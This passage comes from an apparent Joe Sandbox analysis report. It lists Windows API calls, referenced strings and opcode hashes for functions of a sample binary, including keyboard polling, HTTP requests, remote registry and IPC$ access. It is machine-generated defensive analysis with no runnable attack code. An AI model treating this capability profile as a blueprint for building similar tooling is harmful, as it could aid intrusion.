                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: 7f598bfce48c2f0a398d9d729150f24249e70e50ce6e53c16860f6fb45c223df
                                                                                                                                                                  • Instruction ID: e6ea73f2a278fb8ddde1115bbebd821aea2691c9011d7ff15763a27681242ffe
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f598bfce48c2f0a398d9d729150f24249e70e50ce6e53c16860f6fb45c223df
                                                                                                                                                                  • Instruction Fuzzy Hash: 4541F760A147DB7DFF30CFA4A4083B5BAA96B15344F448049D5C6462C2DBEC9BE88B69
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0021A2AA
                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 0021A2F5
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0021A307
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0021A327
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0021A36A
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 0021A37E
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0021A393
                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 0021A3A0
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021A3A9
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0021A3BB
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021A3C6
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                  • Opcode ID: 82367166874ad46793c5ee63878485c7a8ec72da2d9fe9959827bf58e74d7d53
                                                                                                                                                                  • Instruction ID: b8d4d171c910da6a6e02a887d7738bd1d8e9f49f84618c9d10e617bb80fd5fb3
                                                                                                                                                                  • Opcode Fuzzy Hash: 82367166874ad46793c5ee63878485c7a8ec72da2d9fe9959827bf58e74d7d53
                                                                                                                                                                  • Instruction Fuzzy Hash: C9414E71E1121DAFDB01DFA4DC889EEBBB9FF58344F008065F511A3261DB70AA95CBA1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • CoInitialize.OLE32 ref: 0023B298
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023B2A3
                                                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,0026D8FC,?), ref: 0023B303
                                                                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 0023B376
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B410
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B471
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                                                  • Opcode ID: 97b78203a02ee17a1c32b967302540d20f15cc7265879b1b1d47c068570aea8e
                                                                                                                                                                  • Instruction ID: 96096f93d0720879e1c91d06da42b607636ab34f518efd49248c2bd578358e3e
                                                                                                                                                                  • Opcode Fuzzy Hash: 97b78203a02ee17a1c32b967302540d20f15cc7265879b1b1d47c068570aea8e
                                                                                                                                                                  • Instruction Fuzzy Hash: D561DCB0624312AFC712DF54C888F6EB7E8AF88714F00444DFA859B2A1C7B0ED55CB92
                                                                                                                                                                  APIs
                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 002386F5
                                                                                                                                                                  • inet_addr.WS2_32(?), ref: 0023873A
                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00238746
                                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00238754
                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002387C4
                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002387DA
                                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0023884F
                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00238855
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                  • String ID: Ping
                                                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                                                  • Opcode ID: f746378f04819a9c2050cff854b2db5a962950321b126183e7b3a74d1daf9704
                                                                                                                                                                  • Instruction ID: a39dc3a83899c6522b69580445b51f315087cb1b072cfeeb1b34c0f0d69c0767
                                                                                                                                                                  • Opcode Fuzzy Hash: f746378f04819a9c2050cff854b2db5a962950321b126183e7b3a74d1daf9704
                                                                                                                                                                  • Instruction Fuzzy Hash: FB51C2716143059FD710EF25DC89B2ABBE4EF48720F10882AF956DB2A1DBB0EC11CB42
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00249C68
                                                                                                                                                                  • CreateMenu.USER32 ref: 00249C83
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00249C92
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00249D1F
                                                                                                                                                                  • IsMenu.USER32(?), ref: 00249D35
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00249D3F
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00249D70
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00249D7E
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 176399719-4108050209
                                                                                                                                                                  • Opcode ID: 23574323d89a1fc33587ace7f24898025fbfd09a7102ec5d8d3e8f59956272e0
                                                                                                                                                                  • Instruction ID: a6b1ed30b1d21263a1e53ec40d09e80c37d98232dd1bb4dfaa5bacac71d01c34
                                                                                                                                                                  • Opcode Fuzzy Hash: 23574323d89a1fc33587ace7f24898025fbfd09a7102ec5d8d3e8f59956272e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 90418A75A1020AEFDB14EF64E888BDA7BB5FF49314F144028F95697351D770A960CF60
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022EC1E
                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0022EC94
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0022EC9E
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0022ED0B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                                                  • Opcode ID: 95da1eca0673eec70c1b42635f780a14b0b643fe68291ec9e8873d9387e0ba7a
                                                                                                                                                                  • Instruction ID: 2e3744a6a78f7d55a3d17299291d6f309bc851c5c19ae9045cf9929936c778a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 95da1eca0673eec70c1b42635f780a14b0b643fe68291ec9e8873d9387e0ba7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D31F035A1021AAFCF00EFE4E849AAEB7B4EF55700F158066F405EB291DBB09E51DB81
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0021C782
                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 0021C78D
                                                                                                                                                                  • GetParent.USER32 ref: 0021C7A9
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0021C7AC
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021C7B5
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021C7D1
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0021C7D4
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                                                  • Opcode ID: 570d988261fae244f10b17ca29fd0c09dedcdcdb313c1d97a39dd098315965f0
                                                                                                                                                                  • Instruction ID: a9159825d0f24626cbe8ddb517b8722b20ba52e859bfa716c0982bd4adf6a7eb
                                                                                                                                                                  • Opcode Fuzzy Hash: 570d988261fae244f10b17ca29fd0c09dedcdcdb313c1d97a39dd098315965f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D21C479A40208BFCF05EB60DC95DFEB7A9EB56300F204115F562931E1DBB45866DF20
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0021C869
                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 0021C874
                                                                                                                                                                  • GetParent.USER32 ref: 0021C890
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0021C893
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021C89C
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021C8B8
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0021C8BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                                                  • Opcode ID: 553f05babc29592d301611cb629ed063924126d48320f812ca4c817dfd47ae4d
                                                                                                                                                                  • Instruction ID: f471c20ad46b8ddcf7e723c6df06979fa000807c6136e34a0152fe0e4fb5579a
                                                                                                                                                                  • Opcode Fuzzy Hash: 553f05babc29592d301611cb629ed063924126d48320f812ca4c817dfd47ae4d
                                                                                                                                                                  • Instruction Fuzzy Hash: E121C179A00208BFDF01AB60DC95EFEB7A9EB55300F204011F512A31A1DBB4586A9B20
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32 ref: 0021C8D9
                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 0021C8EE
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021C900
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0021C97B
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                                                  • Opcode ID: 1e1b0ab62d55babe5d9dd0b28e3c8fa43b5d3f7e523cc96b106eae1054a64fc4
                                                                                                                                                                  • Instruction ID: b929bac9355886a1964cbfbd839bdad93bed3ab16a42941ec2c15ca37c450a40
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1b0ab62d55babe5d9dd0b28e3c8fa43b5d3f7e523cc96b106eae1054a64fc4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0511A77E6A8347B9FB042A20EC1ADF677DC9B27768B300022F900A50D2FFA169764954
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0022B137
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                                                  • Opcode ID: e0077003367803dec46b4092739fee7d1cedcd64361925bca5f9dba232a87a8f
                                                                                                                                                                  • Instruction ID: 0d58f5ca0f041d4348c98266b413f35ccae5205be968fd38e0cf6fdc303ff274
                                                                                                                                                                  • Opcode Fuzzy Hash: e0077003367803dec46b4092739fee7d1cedcd64361925bca5f9dba232a87a8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC18E75A1022AEFDB01CF98E485BAEB7F4FF08315F24406AE615E7251C774AA91CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0020BA74
                                                                                                                                                                    • Part of subcall function 00208984: __mtinitlocknum.LIBCMT ref: 00208996
                                                                                                                                                                    • Part of subcall function 00208984: RtlEnterCriticalSection.NTDLL(00200127), ref: 002089AF
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020BA85
                                                                                                                                                                    • Part of subcall function 00207616: __calloc_impl.LIBCMT ref: 00207625
                                                                                                                                                                    • Part of subcall function 00207616: Sleep.KERNEL32(00000000,?,00200127,?,001E125D,00000058,?,?), ref: 0020763C
                                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0020BAA0
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00296990,00000064,00206B14,002967D8,00000014), ref: 0020BAF9
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020BB44
                                                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 0020BB8B
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0020BBC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00224A7D
                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224A91
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00224A98
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AA7
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00224AB9
                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AD2
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AE4
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B29
                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B3E
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B49
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?), ref: 0025EC32
                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0025EC49
                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 0025EC55
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0025EC64
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025EC76
                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0025EC94
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumChildWindows.USER32(?,0021DD46), ref: 0021DC86
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                                                  APIs
                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001E45F0
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 001E4695
                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 001E47BD
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00255936
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0025599D
                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002559CA
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                  • String ID: close all
                                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 001FC2D2
                                                                                                                                                                    • Part of subcall function 001FC697: GetClientRect.USER32(?,?), ref: 001FC6C0
                                                                                                                                                                    • Part of subcall function 001FC697: GetWindowRect.USER32(?,?), ref: 001FC701
                                                                                                                                                                    • Part of subcall function 001FC697: ScreenToClient.USER32(?,?), ref: 001FC729
                                                                                                                                                                  • GetDC.USER32 ref: 0025E006
                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0025E019
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0025E027
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0025E03C
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025E044
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0025E0CF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                                  • Opcode ID: 8d68fc2065da8f108d8448f70382546e82c0a319e17b0f96a65ce0d1f15df8ce
                                                                                                                                                                  • Instruction ID: 4a19ed84ea77d46dccd431fe032c3f05fef96302ba2cfd5cb4d360a1d102b21e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8d68fc2065da8f108d8448f70382546e82c0a319e17b0f96a65ce0d1f15df8ce
                                                                                                                                                                  • Instruction Fuzzy Hash: F171353051020EDFCF29CF64C884AFA3BB5FF09362F154269ED566A1A1C7708D69DB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00234C5E
                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00234C8A
                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00234CCC
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00234CE1
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00234CEE
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00234D1E
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00234D65
                                                                                                                                                                    • Part of subcall function 002356A9: GetLastError.KERNEL32(?,?,00234A2B,00000000,00000000,00000001), ref: 002356BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                                                                  • Opcode ID: f6e36c4a4f48f83493716ee10d522f574b5f4a083e8862e4cc202f7c8fb7e0a6
                                                                                                                                                                  • Instruction ID: f8aa97170a18b759fb653eb8078e0d965de61037b240796964f209d894fa3a46
                                                                                                                                                                  • Opcode Fuzzy Hash: f6e36c4a4f48f83493716ee10d522f574b5f4a083e8862e4cc202f7c8fb7e0a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 994190F1A11219BFEB129F60DC89FFA77ACEF08314F108156FA059A151DBB0AD548BA0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • _memset.LIBCMT ref: 0021AF74
                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0021AFA9
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0021AFC5
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0021B00B
                                                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 0021B033
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectConnection2FromQueryRegistryStringValue_memmove_memset
                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                  • API String ID: 1159971868-22481851
                                                                                                                                                                  • Opcode ID: 10aaef1f5aa885fc8aaefd94a4510dc9b1a2ba4e2eeb5982e4a51830f5ffab65
                                                                                                                                                                  • Instruction ID: b22ad073a88367f164289f0e5e25a7e10837583e89d7603669fc6c1b15f7f1b4
                                                                                                                                                                  • Opcode Fuzzy Hash: 10aaef1f5aa885fc8aaefd94a4510dc9b1a2ba4e2eeb5982e4a51830f5ffab65
                                                                                                                                                                  • Instruction Fuzzy Hash: 62412976C1062DAADF11EFA5DC959EEB7B8BF28704F004029F811A31A1EB719E15CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0027DBF0), ref: 0023BBA1
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0027DBF0), ref: 0023BBD5
                                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0023BD33
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0023BD5D
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 0023BEAD
                                                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 0023BEF7
                                                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 0023BF14
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 793797124-0
                                                                                                                                                                  • Opcode ID: e0c703913457cb9de8157f15755af2ff957ad4909652b4fbde96fc88448bcfb1
                                                                                                                                                                  • Instruction ID: 645e35b6ecc3cc5aa852a257ded44621b648a7fe67fc2d47d489b6a08b5888a1
                                                                                                                                                                  • Opcode Fuzzy Hash: e0c703913457cb9de8157f15755af2ff957ad4909652b4fbde96fc88448bcfb1
                                                                                                                                                                  • Instruction Fuzzy Hash: ADF11E75A10109EFCB15DFA4C888EAEB7B9FF89314F108459FA05AB250DB71AE51CF90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001E4954,00000000), ref: 001E4A23
                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001FB85B), ref: 001FB926
                                                                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,001FB85B,00000000,?,?,001FAF1E,?,?), ref: 001FB9BD
                                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0025E775
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0025E7EB
                                                                                                                                                                  Memory Dump Source
